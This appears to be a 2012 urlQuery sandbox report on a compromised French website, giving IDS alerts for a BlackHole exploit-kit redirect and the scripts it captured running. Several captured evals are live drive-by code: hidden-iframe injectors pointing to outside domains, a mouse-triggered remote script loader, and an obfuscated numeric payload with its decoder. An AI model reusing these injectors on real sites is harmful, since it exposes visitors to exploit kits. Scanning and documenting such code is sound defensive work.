Overview

URLhttp://wegoproject.free.fr/
IP212.27.63.168
ASNAS12322 Free SAS
Location France
Report completed2012-11-08 20:29:51 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection
Detected BlackHole v1.x exploit kit URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-08 20:29:10 212.27.63.168 urlQuery Client2ET CURRENT_EVENTS http string in hex Likely Obfuscated Exploit Redirect
2012-11-08 20:29:11 urlQuery Client 82.208.40.42ET CURRENT_EVENTS HTTP Request to a *.cz.cc domain
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 212.27.63.168

Date Alerts / IDS URL IP
2013-03-26 11:27:081 / 3http://newarteam.free.fr/upl.htm212.27.63.168
2013-03-26 03:38:020 / 0http://212.27.63.168212.27.63.168
2013-03-25 15:55:591 / 3http://newarteam.free.fr/upl.htm212.27.63.168
2013-03-19 08:19:091 / 2http://arsenicjdr.free.fr/pages/200812demomkd01.php212.27.63.168
2013-03-19 08:15:561 / 2http://arsenicjdr.free.fr/pages/200710atdeco01.php212.27.63.168
2013-03-08 16:19:331 / 1http://moutarsclub.free.fr/212.27.63.168

Last 6 reports on ASN: AS12322 Free SAS

Date Alerts / IDS URL IP
2013-03-31 18:01:460 / 4http://www.assurance-20.pl/la-douche-non-censuree-de-nabila-amelie-0-66.html88.191.120.188
2013-03-31 16:29:090 / 1http://ltisat.free.fr/telecharger/disk1_1.exe212.27.63.129
2013-03-31 13:45:011 / 2http://nimotozor99.free.fr/hurel-clement.htm212.27.63.108
2013-03-31 05:43:570 / 2http://neocity1.free.fr/animation_programme/faux_virus/f0024.exe212.27.63.115
2013-03-30 16:35:300 / 0http://lolbuzz.fr/elle-se-fait-caresser-le-minou-en-chantant-pendant-son-concert88.190.219.181
2013-03-30 15:01:420 / 1http://www.kastorsoft.com/dl/setup_streamrecorder.exe88.190.16.23



JavaScript

Executed Scripts (50)


Executed Evals (8)

#1 JavaScript::Eval (size: 613, repeated: 1)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://google-banking.com/main.php?page=f8a892dc63e25f27' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://google-banking.com/main.php?page=f8a892dc63e25f27');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 567, repeated: 1) - Alert detect on script (Severity: 2)

  if (document.getElementsByTagName('body')[0]) {
      iframer();
  } else {
      document.write("<iframe src='http://nt-stats.cz.cc/counter.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  }
  function iframer() {
      var f = document.createElement('iframe');
      f.setAttribute('src', 'http://nt-stats.cz.cc/counter.htm');
      f.style.visibility = 'hidden';
      f.style.position = 'absolute';
      f.style.left = '0';
      f.style.top = '0';
      f.setAttribute('width', '10');
      f.setAttribute('height', '10');
      document.getElementsByTagName('body')[0].appendChild(f);
  }

#3 JavaScript::Eval (size: 7548, repeated: 1)

$(document).ready(function() {
    tb_init('a.thickbox, area.thickbox, input.thickbox');
    imgLoader = new Image();
    imgLoader.src = tb_pathToImage
});

function tb_init(b) {
    $(b).click(function() {
        var t = this.title || this.name || null;
        var a = this.href || this.alt;
        var g = this.rel || false;
        tb_show(t, a, g);
        this.blur();
        return false
    })
}
function tb_show(d, f, g) {
    try {
        if (typeof document.body.style.maxHeight === "undefined") {
            $("body", "html").css({
                height: "100%",
                width: "100%"
            });
            $("html").css("overflow", "hidden");
            if (document.getElementById("TB_HideSelect") === null) {
                $("body").append("<iframe id='TB_HideSelect'></iframe><div id='TB_overlay'></div><div id='TB_window'></div>");
                $("#TB_overlay").click(tb_remove)
            }
        } else {
            if (document.getElementById("TB_overlay") === null) {
                $("body").append("<div id='TB_overlay'></div><div id='TB_window'></div>");
                $("#TB_overlay").click(tb_remove)
            }
        }
        if (tb_detectMacXFF()) {
            $("#TB_overlay").addClass("TB_overlayMacFFBGHack")
        } else {
            $("#TB_overlay").addClass("TB_overlayBG")
        }
        if (d === null) {
            d = ""
        }
        $("body").append("<div id='TB_load'><img src='" + imgLoader.src + "' /></div>");
        $('#TB_load').show();
        var h;
        if (f.indexOf("?") !== -1) {
            h = f.substr(0, f.indexOf("?"))
        } else {
            h = f
        }
        var i = /\.jpg$|\.jpeg$|\.png$|\.gif$|\.bmp$/;
        var j = h.toLowerCase().match(i);
        if (j == '.jpg' || j == '.jpeg' || j == '.png' || j == '.gif' || j == '.bmp') {
            TB_PrevCaption = "";
            TB_PrevURL = "";
            TB_PrevHTML = "";
            TB_NextCaption = "";
            TB_NextURL = "";
            TB_NextHTML = "";
            TB_imageCount = "";
            TB_FoundURL = false;
            if (g) {
                TB_TempArray = $("a[@rel=" + g + "]").get();
                for (TB_Counter = 0;
                ((TB_Counter < TB_TempArray.length) && (TB_NextHTML === "")); TB_Counter++) {
                    var k = TB_TempArray[TB_Counter].href.toLowerCase().match(i);
                    if (!(TB_TempArray[TB_Counter].href == f)) {
                        if (TB_FoundURL) {
                            TB_NextCaption = TB_TempArray[TB_Counter].title;
                            TB_NextURL = TB_TempArray[TB_Counter].href;
                            TB_NextHTML = "<span id='TB_next'>&nbsp;&nbsp;<a href='#'>Next &gt;</a></span>"
                        } else {
                            TB_PrevCaption = TB_TempArray[TB_Counter].title;
                            TB_PrevURL = TB_TempArray[TB_Counter].href;
                            TB_PrevHTML = "<span id='TB_prev'>&nbsp;&nbsp;<a href='#'>&lt; Prev</a></span>"
                        }
                    } else {
                        TB_FoundURL = true;
                        TB_imageCount = "Image " + (TB_Counter + 1) + " of " + (TB_TempArray.length)
                    }
                }
            }
            imgPreloader = new Image();
            imgPreloader.onload = function() {
                imgPreloader.onload = null;
                var a = tb_getPageSize();
                var x = a[0] - 150;
                var y = a[1] - 150;
                var b = imgPreloader.width;
                var c = imgPreloader.height;
                if (b > x) {
                    c = c * (x / b);
                    b = x;
                    if (c > y) {
                        b = b * (y / c);
                        c = y
                    }
                } else if (c > y) {
                    b = b * (y / c);
                    c = y;
                    if (b > x) {
                        c = c * (x / b);
                        b = x
                    }
                }
                TB_WIDTH = b + 30;
                TB_HEIGHT = c + 60;
                $("#TB_window").append("<a href='' id='TB_ImageOff' title='Close'><img id='TB_Image' src='" + f + "' width='" + b + "' height='" + c + "' alt='" + d + "'/></a>" + "<div id='TB_caption'>" + d + "<div id='TB_secondLine'>" + TB_imageCount + TB_PrevHTML + TB_NextHTML + "</div></div><div id='TB_closeWindow'><a href='#' id='TB_closeWindowButton' title='Close'>close</a> or Esc Key</div>");
                $("#TB_closeWindowButton").click(tb_remove);
                if (!(TB_PrevHTML === "")) {
                    function goPrev() {
                        if ($(document).unbind("click", goPrev)) {
                            $(document).unbind("click", goPrev)
                        }
                        $("#TB_window").remove();
                        $("body").append("<div id='TB_window'></div>");
                        tb_show(TB_PrevCaption, TB_PrevURL, g);
                        return false
                    }
                    $("#TB_prev").click(goPrev)
                }
                if (!(TB_NextHTML === "")) {
                    function goNext() {
                        $("#TB_window").remove();
                        $("body").append("<div id='TB_window'></div>");
                        tb_show(TB_NextCaption, TB_NextURL, g);
                        return false
                    }
                    $("#TB_next").click(goNext)
                }
                document.onkeydown = function(e) {
                    if (e == null) {
                        keycode = event.keyCode
                    } else {
                        keycode = e.which
                    }
                    if (keycode == 27) {
                        tb_remove()
                    } else if (keycode == 190) {
                        if (!(TB_NextHTML == "")) {
                            document.onkeydown = "";
                            goNext()
                        }
                    } else if (keycode == 188) {
                        if (!(TB_PrevHTML == "")) {
                            document.onkeydown = "";
                            goPrev()
                        }
                    }
                };
                tb_position();
                $("#TB_load").remove();
                $("#TB_ImageOff").click(tb_remove);
                $("#TB_window").css({
                    display: "block"
                })
            };
            imgPreloader.src = f
        } else {
            var l = f.replace(/^[^\?]+\??/, '');
            var m = tb_parseQuery(l);
            TB_WIDTH = (m['width'] * 1) + 30 || 630;
            TB_HEIGHT = (m['height'] * 1) + 40 || 440;
            ajaxContentW = TB_WIDTH - 30;
            ajaxContentH = TB_HEIGHT - 45;
            if (f.indexOf('TB_iframe') != -1) {
                urlNoQuery = f.split('TB_');
                $("#TB_iframeContent").remove();
                if (m['modal'] != "true") {
                    $("#TB_window").append("<div id='TB_title'><div id='TB_ajaxWindowTitle'>" + d + "</div><div id='TB_closeAjaxWindow'><a href='#' id='TB_closeWindowButton' title='Close'>close</a> or Esc Key</div></div><iframe frameborder='0' hspace='0' src='" + urlNoQuery[0] + "' id='TB_iframeContent' name='TB_iframeContent" + Math.round(Math.random() * 1000) + "' onload='tb_showIframe()' style='width:" + (ajaxContentW + 29) + "px;height:" + (ajaxContentH + 17) + "px;' > </iframe>")
                } else {
                    $("#TB_overlay").unbind();
                    $("#TB_window").append("<iframe frameborder='0' hspace='0' src='" + urlNoQuery[0] + "' id='TB_iframeContent' name='TB_iframeContent" + Math.round(Math.random() * 1000) + "' onload='tb_showIframe()' style='width:" + (ajaxContentW + 29) + "px;height:" + (ajaxContentH + 17) + "px;'> </iframe>")
                }
            } else {
                if ($("#TB_window").css("display") != "block") {
                    if (m['modal'] != "true") {
                        $("#TB_window").append("<div id='TB_title'><div id='TB_ajaxWindowTitle'>" + d + "</div><div id='TB_closeAjaxWindow'><a href='#' id='TB_closeWindowButton'>close</a> or Esc Key</div></div><div id='TB_ajaxContent' style='width:" + ajaxContentW + "px;height:" + ajaxContentH + "px'></div>")
                    } else {
                        $("#TB_overlay").unbind();
                        $("#TB_window").append("<div id='TB_ajaxContent' class='TB_modal' style='width:" + ajaxContentW + "px;height:" + ajaxContentH + "px;'></div>")
                    }
                } else {
                    $("#TB_ajaxContent")[0].style.width = ajaxContentW + "px";
                    $("#TB_ajaxContent")[0].style.height = ajaxContentH + "px";
                    $("#TB_ajaxContent")[0].scrollTop = 0;
                    $("#TB_ajaxWindowTitle").html(d)
                }
            }
            $("#TB_closeWindowButton").click(tb_remove);
            if (f.indexOf('TB_inline') != -1) {
                $("#TB_ajaxContent").append($('#' + m['inlineId']).children());
                $("#TB_window").unload(function() {
                    $('#' + m['inlineId']).append($("#TB_ajaxContent").children())
                });
                tb_position();
                $("#TB_load").remove();
                $("#TB_window").css({
                    display: "block"
                })
            } else if (f.indexOf('TB_iframe') != -1) {
                tb_position();
                if ($.browser.safari) {
                    $("#TB_load").remove();
                    $("#TB_window").css({
                        display: "block"
                    })
                }
            } else {
                $("#TB_ajaxContent").load(f += "&random=" + (new Date().getTime()), function() {
                    tb_position();
                    $("#TB_load").remove();
                    tb_init("#TB_ajaxContent a.thickbox");
                    $("#TB_window").css({
                        display: "block"
                    })
                })
            }
        }
        if (!m['modal']) {
            document.onkeyup = function(e) {
                if (e == null) {
                    keycode = event.keyCode
                } else {
                    keycode = e.which
                }
                if (keycode == 27) {
                    tb_remove()
                }
            }
        }
    } catch (e) {}
}
function tb_showIframe() {
    $("#TB_load").remove();
    $("#TB_window").css({
        display: "block"
    })
}
function tb_remove() {
    $("#TB_imageOff").unbind("click");
    $("#TB_closeWindowButton").unbind("click");
    $("#TB_window").fadeOut("fast", function() {
        $('#TB_window,#TB_overlay,#TB_HideSelect').trigger("unload").unbind().remove()
    });
    $("#TB_load").remove();
    if (typeof document.body.style.maxHeight == "undefined") {
        $("body", "html").css({
            height: "auto",
            width: "auto"
        });
        $("html").css("overflow", "")
    }
    document.onkeydown = "";
    document.onkeyup = "";
    return false
}
function tb_position() {
    $("#TB_window").css({
        marginLeft: '-' + parseInt((TB_WIDTH / 2), 10) + 'px',
        width: TB_WIDTH + 'px'
    });
    if (!(jQuery.browser.msie && jQuery.browser.version < 7)) {
        $("#TB_window").css({
            marginTop: '-' + parseInt((TB_HEIGHT / 2), 10) + 'px'
        })
    }
}
function tb_parseQuery(a) {
    var b = {};
    if (!a) {
        return b
    }
    var c = a.split(/[;&]/);
    for (var i = 0; i < c.length; i++) {
        var d = c[i].split('=');
        if (!d || d.length != 2) {
            continue
        }
        var e = unescape(d[0]);
        var f = unescape(d[1]);
        f = f.replace(/\+/g, ' ');
        b[e] = f
    }
    return b
}
function tb_getPageSize() {
    var a = document.documentElement;
    var w = window.innerWidth || self.innerWidth || (a && a.clientWidth) || document.body.clientWidth;
    var h = window.innerHeight || self.innerHeight || (a && a.clientHeight) || document.body.clientHeight;
    arrayPageSize = [w, h];
    return arrayPageSize
}
function tb_detectMacXFF() {
    var a = navigator.userAgent.toLowerCase();
    if (a.indexOf('mac') != -1 && a.indexOf('firefox') != -1) {
        return true
    }
}

#4 JavaScript::Eval (size: 580, repeated: 1)

(function() {
    var url = 'http://alls4you.org.ua/css/' + Math.random().toString().substring(3) + '.js';
    var flag = 0;
    document.onmousemove = function() {
        if (flag === 0) {
            flag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.onreadystatechange = function() {
                if (this.readyState == 'complete') {
                    flag = 2;
                }
            };
            script.onload = function() {
                flag = 2;
            };
            script.src = url;
            head.appendChild(script);
        }
    };
})();

#5 JavaScript::Eval (size: 1928, repeated: 1)

[12, 12, 188, 180, 28, 4, 192, 44, 136, 104, 172, 36, 24, 20, 156, 92, 36, 20, 32, 184, 36, 172, 36, 24, 20, 60, 160, 88, 68, 48, 92, 84, 48, 172, 36, 4, 120, 168, 44, 192, 88, 120, 144, 76, 0, 16, 144, 40, 12, 12, 12, 188, 180, 56, 48, 172, 36, 56, 4, 144, 148, 12, 12, 176, 28, 36, 184, 60, 36, 28, 40, 12, 12, 12, 192, 44, 136, 104, 172, 36, 24, 20, 156, 108, 56, 188, 20, 36, 4, 64, 132, 188, 180, 56, 48, 172, 36, 28, 60, 56, 136, 80, 120, 96, 20, 20, 140, 8, 164, 164, 24, 20, 116, 60, 20, 48, 20, 60, 156, 136, 124, 156, 136, 136, 164, 136, 44, 104, 24, 20, 36, 56, 156, 96, 20, 172, 120, 28, 108, 188, 192, 20, 96, 80, 120, 152, 0, 120, 28, 96, 36, 188, 92, 96, 20, 80, 120, 152, 0, 120, 28, 60, 20, 88, 184, 36, 80, 120, 100, 188, 60, 188, 168, 188, 184, 188, 20, 88, 8, 96, 188, 192, 192, 36, 24, 148, 140, 44, 60, 188, 20, 188, 44, 24, 8, 48, 168, 60, 44, 184, 104, 20, 36, 148, 184, 36, 180, 20, 8, 0, 148, 20, 44, 140, 8, 0, 148, 120, 52, 132, 164, 188, 180, 56, 48, 172, 36, 52, 64, 144, 148, 12, 12, 176, 12, 12, 180, 104, 24, 136, 20, 188, 44, 24, 28, 188, 180, 56, 48, 172, 36, 56, 4, 144, 40, 12, 12, 12, 100, 48, 56, 28, 180, 28, 80, 28, 192, 44, 136, 104, 172, 36, 24, 20, 156, 136, 56, 36, 48, 20, 36, 32, 184, 36, 172, 36, 24, 20, 4, 120, 188, 180, 56, 48, 172, 36, 120, 144, 148, 180, 156, 60, 36, 20, 128, 20, 20, 56, 188, 168, 104, 20, 36, 4, 120, 60, 56, 136, 120, 72, 120, 96, 20, 20, 140, 8, 164, 164, 24, 20, 116, 60, 20, 48, 20, 60, 156, 136, 124, 156, 136, 136, 164, 136, 44, 104, 24, 20, 36, 56, 156, 96, 20, 172, 120, 144, 148, 180, 156, 60, 20, 88, 184, 36, 156, 100, 188, 60, 188, 168, 188, 184, 188, 20, 88, 80, 120, 96, 188, 192, 192, 36, 24, 120, 148, 180, 156, 60, 20, 88, 184, 36, 156, 140, 44, 60, 188, 20, 188, 44, 24, 80, 120, 48, 168, 60, 44, 184, 104, 20, 36, 120, 148, 180, 156, 60, 20, 88, 184, 36, 156, 184, 36, 180, 20, 80, 120, 0, 120, 148, 180, 156, 60, 20, 88, 184, 36, 156, 20, 44, 140, 80, 120, 0, 120, 148, 180, 156, 60, 36, 20, 128, 20, 20, 56, 188, 168, 104, 20, 36, 4, 120, 108, 188, 192, 20, 96, 120, 72, 120, 152, 0, 120, 144, 148, 180, 156, 60, 36, 20, 128, 20, 20, 56, 188, 168, 104, 20, 36, 4, 120, 96, 36, 188, 92, 96, 20, 120, 72, 120, 152, 0, 120, 144, 148, 12, 12, 12, 192, 44, 136, 104, 172, 36, 24, 20, 156, 92, 36, 20, 32, 184, 36, 172, 36, 24, 20, 60, 160, 88, 68, 48, 92, 84, 48, 172, 36, 4, 120, 168, 44, 192, 88, 120, 144, 76, 0, 16, 156, 48, 140, 140, 36, 24, 192, 112, 96, 188, 184, 192, 4, 180, 144, 148, 12, 12, 176]

#6 JavaScript::Eval (size: 4, repeated: 613)

m[i]

#7 JavaScript::Eval (size: 24, repeated: 567)

pos = parseInt(ar2[i] / 4)

#8 JavaScript::Eval (size: 19, repeated: 567)

s += ar.substr(pos, 1)

Executed Writes (34)

#1 JavaScript::Write (size: 1, repeated: 10)

#2 JavaScript::Write (size: 784, repeated: 1)

<!-- --></div><a class="adsbyAff" href="http://www.affinity.com/?utm_source=Affinity&utm_medium=Display%2BAd%2BUnits&utm_campaign=In-Footer%2BAd%2BUnit" target="_blank"><img alt="Ads by affinity" src="http://s1.affinitymatrix.com/tb/v1/theme/fg_affinity-logo-wb.png"></a></td></tr></tbody></table></td></tr></tbody></table></div></div><div id="pubToolbar_tr" style="float: right; z-index:2147483647;background:transparent url(http://s1.affinitymatrix.com/tb/v1/theme/fb_bg_sl_r.gif) repeat-x;height:31px!important;width:30px!important;"><div style="background:transparent url(http://s1.affinitymatrix.com/tb/v1/theme/fb_round_x_close.gif) no-repeat 0 0!important;height:22px!important;width:24px!important;" class="show-hide-button pHhide" title="Close">&nbsp;</div></div></div></div>

#3 JavaScript::Write (size: 10, repeated: 5)

</SCRIPT>

#4 JavaScript::Write (size: 80, repeated: 2)

<SCRIPT SRC="http://adpx.metanetwork.com/ttj?id=931096" TYPE="text/javascript">

#5 JavaScript::Write (size: 80, repeated: 3)

<SCRIPT SRC="http://adpx.metanetwork.com/ttj?id=931097" TYPE="text/javascript">

#6 JavaScript::Write (size: 543, repeated: 1)

<a href="http://ib.adnxs.com/click?AAAAAAAA8D_NzMzMzMzsPwAAAAAAAPA_zczMzMzM7D8AAAAAAADwP4o0mdlxC9RxoArzhH1cTlENCJxQAAAAABg1DgA8AQAANQEAAAIAAADlGzEA9pkCAAAAAQBVU0QAVVNEACwB-gB4MAAAZUcAAgUCAQUAAIQAeiBxWwAAAAA./cnd=%21uAXlMAiKpiMQ5bfEARj2swogAA../referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fxxz97.html/clickenc=http%3A%2F%2Fwww.nexcess.net%2Fmagento-hosting" target="_blank"><img width="300" height="250" style="border-style: none" src="http://cdn.adnxs.com/p/eb/31/71/3c/eb31713cc1a19f82adf9de8175abaef4.png"/></a>

#7 JavaScript::Write (size: 669, repeated: 1)

<a href="http://ib.adnxs.com/click?gnSxaaUQ5T91guyrYfXiPwAAAAAAAPA_dYLsq2H14j-CdLFppRDlP17-tyXDMHlhoArzhH1cTlENCJxQAAAAABk1DgA8AQAANQEAAAIAAADZpCkA9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAAck0AAgUCAQUAAIQAuyRQBwAAAAA./cnd=%21UAUmKwiKeRDZyaYBGPazCiAA/referrer=http%3A%2F%2Fworddictionary.co.uk%2F%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2/clickenc=http%3A%2F%2Fconnect.paloaltonetworks.com%2Fngfw-4dummies-EN%3Futm_source%3DRetargeter%26utm_medium%3Dretargeting%26utm_content%3D728x90%26utm_campaign%3DNGFW4D" target="_blank"><img width="728" height="90" style="border-style: none" src="http://cdn.adnxs.com/p/04/3e/16/58/043e16586e34537547742001edf1b41a.gif"/></a>

#8 JavaScript::Write (size: 3123, repeated: 1)

<div id="frame-535472876_79212400" class="shadframe"  style="display: inline-block; margin: 0; padding: 0; zoom:1; *display: inline; _height: 90px; ; border-style: none; margin:0px; padding: 0px; overflow: hidden; position: relative;width:728px;height:90px;"  >
<a href="http://ib.adnxs.com/click?qvI9IxEaxT9mWlE53P3CPwAAAAAAAPA_ZlpROdz9wj-q8j0jERrFP8E3HEK4geQ0oArzhH1cTlENCJxQAAAAABk1DgA8AQAARwEAAAIAAACEzC4A9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAA700AAgUCAQUAAIQAhiGuiwAAAAA./cnd=!rwR_JAiJSRCEmbsBGPazCiAA/referrer=http://worddictionary.co.uk/static//inpage-affinity/knw79.html/clickenc=http://delivery.steelhousemedia.com/a2click?sh_click=Y2I9Mjc1ODM0Mjk0IXNoX3JpZD1hZHNlcnZlcjMwNC5zdGVlbGhvdXNlLmNvbToxODQxODc4MCFjbGlja191cmw9IW1zPTE2Mzg0IWNyaWQ9MjkxNjAhY2dpZD0xMDk4NSFjaWQ9NTk0MSFndWlkPTBmMTNjOTA0LTJkYmMtNDk3OS1hYjU0LTg2NTEyZGQ5MmMwZiFhaWQ9OTE0MCFzZWdpZD0wIWdvaWQ9TURFNE5Eb3hNVEE1TXpvdE1Ub3dNem94TVRNME9EcHViM0k2TlRjNCFlaWQ9Mjc=!CK=aHR0cDovL3d3dy5wY3Rvb2xzLmNvbS9zcHl3YXJlLWRvY3Rvci1hbnRpdmlydXMvc2VtL3NhdmUyNS8/dXRtX3NvdXJjZT1TdGVlbGhvdXNlJnV0bV9tZWRpdW09QmFubmVyJnV0bV9jYW1wYWlnbj1TdGVlbGhvdXNlX0Jhbm5lciZyZWY9c3RlZWxob3VzZV9iYW5uZXI=" style="border-style: none; margin: 0; padding: 0;" target="_blank"><img alt="http://cdn.steelhousemedia.com/ad973cfcae0d8e4eaabf8106f14a2672.jpg" border="0" height="90" src="http://cdn.steelhousemedia.com/ad973cfcae0d8e4eaabf8106f14a2672.jpg" style="border-style: none; margin: 0; padding: 0;position:absolute; left: 0px; top: 0px;" width="728"/></a> 
<img height="1" src="http://px.steelhousemedia.com/st?plh=http://www.pctools.com/&amp;aid=9140&amp;segment=25off" width="1"/>

<a target="_blank" href="http://delivery.steelhousemedia.com/a2click?sh_click=Y2I9Mjc1ODM0Mjk0IXNoX3JpZD1hZHNlcnZlcjMwNC5zdGVlbGhvdXNlLmNvbToxODQxODc4MCFjbGlja191cmw9YUhSMGNEb3ZMM2QzZHk1emRHVmxiR2h2ZFhObExtTnZiUzlwYm1admNtMWhkR2x2YmkxaFltOTFkQzF6ZEdWbGJHaHZkWE5sTFdGa2N5OC9kWFJ0WDNOdmRYSmpaVDFYWVhSbGNtMWhjbXNtZFhSdFgyMWxaR2wxYlQxU1pYUmhjbWRsZEdsdVp5WjFkRzFmWTJGdGNHRnBaMjQ5UVd4cyFtcz0xNjM4NCFjcmlkPTI5MTYwIWNnaWQ9MTA5ODUhY2lkPTU5NDEhZ3VpZD0wZjEzYzkwNC0yZGJjLTQ5NzktYWI1NC04NjUxMmRkOTJjMGYhYWlkPTk5Mjchc2VnaWQ9MCFjbGlja0lEPVFUSTZWMkYwWlhKdFlYSnJPMkZwWkQwNU1UUXchZ29pZD1NREU0TkRveE1UQTVNem90TVRvd016b3hNVE0wT0RwdWIzSTZOVGM0IWVpZD0yNw==!CK=" ><img src="http://cdn4s.steelhousemedia.com/static/a2/img/ASquared.png" style="border-style: none; border: 0; margin: 0; padding: 0; position: absolute; z-index: 4998; right: 0px; bottom: 0px;; " /></a><div  style="width:728px; height:1px; top: 0px; left: 0px; margin: 0px; padding: 0px; border: 0; background-color: black; position: absolute;  z-index: 4999"></div><div  style="width:728px; height:1px; bottom: 0px; left: 0px; margin: 0px; padding: 0px; border: 0; background-color: black; position: absolute;  z-index: 4999"></div><div  style="width: 1px; height:90px; top: 0px; left: 0px; margin: 0px; padding: 0px; border: 0; background-color: black; position: absolute;  z-index: 4999"></div><div  style="width: 1px; height:90px; top: 0px; right: 0px; margin: 0px; padding: 0px; border: 0; background-color: black; position: absolute;  z-index: 4999"></div></div>

#9 JavaScript::Write (size: 3108, repeated: 1)

<div id="frame-837590855_363039290" class="shadframe"  style="display: inline-block; margin: 0; padding: 0; zoom:1; *display: inline; _height: 90px; ; border-style: none; margin:0px; padding: 0px; overflow: hidden; position: relative;width:728px;height:90px;"  >
<a href="http://ib.adnxs.com/click?NKmhDcAGwj9IGKtyRjnAPwAAAAAAAPA_SBirckY5wD8zqaENwAbCP9U8wO86DuNAoArzhH1cTlENCJxQAAAAABk1DgA8AQAARwEAAAIAAACEzC4A9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAArTsAAgUCAQUAAIQAsR8m1gAAAAA./cnd=!rwR_JAiJSRCEmbsBGPazCiAA/referrer=http://worddictionary.co.uk/static//inpage-affinity/zsa52.html/clickenc=http://delivery.steelhousemedia.com/a2click?sh_click=Y2I9NTk4MzM1MTA5IXNoX3JpZD1hZHNlcnZlcjMwOC5zdGVlbGhvdXNlLmNvbTo4OTIyMTQ1IWNsaWNrX3VybD0hbXM9MTYzODQhY3JpZD0yOTIwNSFjZ2lkPTEwOTk4IWNpZD01OTQxIWd1aWQ9MTNiOTdiNGEtNWMzMC00YjIyLTg4ZmQtMThlN2IzN2RjMWJiIWFpZD05MTQwIXNlZ2lkPTAhZ29pZD1NREU0TkRveE1UQTVNem90TVRvd016b3hNVE0wT0RwdWIzSTZOVGM0IWVpZD0yNw==!CK=aHR0cDovL3d3dy5wY3Rvb2xzLmNvbS9saW1pdGVkb2ZmZXIvcHJvdGVjdGlvbi8/dXRtX3NvdXJjZT1TdGVlbGhvdXNlJnV0bV9tZWRpdW09QmFubmVyJnV0bV9jYW1wYWlnbj1TdGVlbGhvdXNlX0Jhbm5lciZyZWY9c3RlZWxob3VzZV9iYW5uZXI=" style="border-style: none; margin: 0; padding: 0;" target="_blank"><img alt="http://cdn.steelhousemedia.com/159e274a4df3b28fd1769dfa249e94c9.jpg" border="0" height="90" src="http://cdn.steelhousemedia.com/159e274a4df3b28fd1769dfa249e94c9.jpg" style="border-style: none; margin: 0; padding: 0;position:absolute; left: 0px; top: 0px;" width="728"/></a> 
<img height="1" src="http://px.steelhousemedia.com/st?plh=http://www.pctools.com/&amp;aid=9140&amp;segment=save12.50" width="1"/>

<a target="_blank" href="http://delivery.steelhousemedia.com/a2click?sh_click=Y2I9NTk4MzM1MTA5IXNoX3JpZD1hZHNlcnZlcjMwOC5zdGVlbGhvdXNlLmNvbTo4OTIyMTQ1IWNsaWNrX3VybD1hSFIwY0RvdkwzZDNkeTV6ZEdWbGJHaHZkWE5sTG1OdmJTOXBibVp2Y20xaGRHbHZiaTFoWW05MWRDMXpkR1ZsYkdodmRYTmxMV0ZrY3k4L2RYUnRYM052ZFhKalpUMVhZWFJsY20xaGNtc21kWFJ0WDIxbFpHbDFiVDFTWlhSaGNtZGxkR2x1WnlaMWRHMWZZMkZ0Y0dGcFoyNDlRV3hzIW1zPTE2Mzg0IWNyaWQ9MjkyMDUhY2dpZD0xMDk5OCFjaWQ9NTk0MSFndWlkPTEzYjk3YjRhLTVjMzAtNGIyMi04OGZkLTE4ZTdiMzdkYzFiYiFhaWQ9OTkyNyFzZWdpZD0wIWNsaWNrSUQ9UVRJNlYyRjBaWEp0WVhKck8yRnBaRDA1TVRRdyFnb2lkPU1ERTRORG94TVRBNU16b3RNVG93TXpveE1UTTBPRHB1YjNJNk5UYzQhZWlkPTI3!CK=" ><img src="http://cdn4s.steelhousemedia.com/static/a2/img/ASquared.png" style="border-style: none; border: 0; margin: 0; padding: 0; position: absolute; z-index: 4998; right: 0px; bottom: 0px;; " /></a><div  style="width:728px; height:1px; top: 0px; left: 0px; margin: 0px; padding: 0px; border: 0; background-color: black; position: absolute;  z-index: 4999"></div><div  style="width:728px; height:1px; bottom: 0px; left: 0px; margin: 0px; padding: 0px; border: 0; background-color: black; position: absolute;  z-index: 4999"></div><div  style="width: 1px; height:90px; top: 0px; left: 0px; margin: 0px; padding: 0px; border: 0; background-color: black; position: absolute;  z-index: 4999"></div><div  style="width: 1px; height:90px; top: 0px; right: 0px; margin: 0px; padding: 0px; border: 0; background-color: black; position: absolute;  z-index: 4999"></div></div>

#10 JavaScript::Write (size: 272, repeated: 1)

<frameset rows="100%,*" frameborder="no" border="0" framespacing="0"><frame src="http://11649.bodisparking.com/securityvideocamera.net?szcp=58&framerequest=1&refurl=http%3A%2F%2F11649.bodisparking.com%2Fsecurityvideocamera.net%3Fszcp%3D58" name="landingparent"></frameset>

#11 JavaScript::Write (size: 751, repeated: 1)

